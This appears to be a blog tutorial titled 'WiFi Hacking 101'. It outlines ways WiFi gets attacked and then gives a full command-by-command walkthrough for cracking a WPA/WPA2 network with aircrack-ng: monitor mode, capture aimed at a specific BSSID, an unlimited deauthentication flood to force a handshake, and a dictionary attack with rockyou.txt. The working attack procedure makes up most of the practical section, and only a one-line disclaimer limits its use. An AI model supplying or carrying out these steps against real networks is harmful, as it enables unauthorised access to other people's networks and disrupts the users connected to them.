WiFi Hacking 101

WiFi Hacking 101

ยท

4 min read

Table of contents

No heading

No headings in the article.

Wireless hacking has somehow been simplified with the use of numerous hacking tools available all over the internet. To some, this is as simple as spelling out your name but to many, it is still a daunting task. This article aims to give you a better understanding of how wireless networks are secured and how hackers can exploit insufficient WiFi security and take advantage of weak user credentials.

How do hackers hack WiFi you ask? Well, in one or more of the following ways:

  1. Sniffing; This method involves the hacker hijacking the packets being transmitted between the router to the various devices. This packet is later subjected to a brute force attack which will reveal the credentials therein. If the packet is heavily encrypted, it will take some time for it to be deciphered but eventually it will be.

  2. Spoofing; Most smartphones or laptops automatically connect to networks that they have been connected to previously which assists us in establishing the connection automatically (because we're too lazy to keep doing it manually ๐Ÿ˜). This feature can be exploited by hackers in a brilliant yet simple way. All a hacker needs to do is set up a new network with stronger signals, use the same SSID as the legit router which will cause devices to automatically connect to the newly set-up Wi-Fi router thus enabling the hacker to monitor all incoming and outgoing traffic.

  3. Wardriving; Wardriving/Access Point mapping involves spotting and exploiting wireless local area networks while driving around in a car. Mainly achieved by carrying a laptop, a wireless Ethernet card, and an antenna for signal boost. Most organizations with wireless networks broadcast signals beyond their office premises, which can subsequently be picked up by hackers & used to intrude the organizational network.

  4. Encryption Cracking; Routers encrypt all sent data and decrypt it with the decryption key when they receive it. The three main security protocols supported by Wi-Fi routers for securing wireless networks are WEP (Wired Equivalent Privacy), WPA (Wi-Fi Protected Access), as well as WPA2 (Wi-Fi Protected Access II). Both WEP and WPA are two basic options for encrypting your wireless communication, but they have weaknesses that can easily be exploited by cybercriminals. WPA2, on the other hand, is much more secure as it provides a stronger encryption mechanism through the use of AES (Advanced Encryption Standard). However, WPA2 can also be cracked with the help of tools and software. While WPA3 (Wi-Fi Protected Access III) is a new and improved security protocol to secure wireless connections, widespread adoption is still expected to take some time.

How then do we hack wireless networks? This will involve cracking the WEP/WPA keys using the following tools;

  • A wireless network adapter capable of injecting packets
  • Wireshark - to capture traffic between the router and devices
  • Aircrack-ng suite - this powerful tool is found by default in the Kali linux distro and includes Airmon-ng and Airodump-ng among others

In this demonstration, the following steps will be followed;

  • Configure WiFi adapter to monitor mode

  • Info gathering on nearby Access Points i.e MAC address, Channel number, Authentication type & clients/stations connected to a specific access point

  • De-authenticate a client connected to a specific access point so we can capture a four-way handshake

  • Capture the four-way handshake

  • Brute-force captured packet

Without further ado, let the games begin!

a. Run the following commands to check your wireless adapter settings, check for any processes that may conflict with the adapter and kill those processes

iwconfig
airmon-ng check
airmon-ng check kill

b. Enable monitor mode on the wireless adapter to sniff wireless connections. N/B; specify your wireless adapter e.g wlan0

airmon-ng start wlan0

c. After setting it to monitor mode, test whether the adapter is capable of injection

aireplay-ng --test wlan0

d. At this point, take note of the router BSSID, the channel it is on and the name. Next, capture the traffic and 4-way authentication handshake for the target Access Point of interest

airodump-ng -w capture -c 2 --bssid E8:65:D4:CB:E3:A0 wlan0
  1. -w = write to file named 'capture'
  2. -c = channel
  3. --bssid = filter Access Points by BSSID

e. After a WPA handshake has been established, de-authenticate the connected users to prompt them to connect back to the router. The 4-way authentication handshake we're interested in gathering is generated by the reauthentication. We utilize this to crack the WPA/WPA2 pre-shared key.

aireplay-ng --deauth 0 -a E8:65:D4:CB:E3:A0 wlan0

where:

  1. --deauth = send deauthentication beacon
  2. 0 is the number of deauths to send (0 means infinite)
  3. -a = specifies the MAC address of the Access Point

f. When the 4-way handshake is captured, run aircrack-ng to crack the pre-shared key. You can use common wordlists like rockyou.txt to crack simple passwords*

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b E8:65:D4:CB:E3:A0 capture.cap

*Cracking simple passwords using aircrack-ng uses the machine CPU which is much slower but cracking more complex passwords may require tools like hashcat which utilizes the GPU for faster cracking.

Disclaimer: This article has been written for educational purposes only. Please do not use this for malicious intent.

ย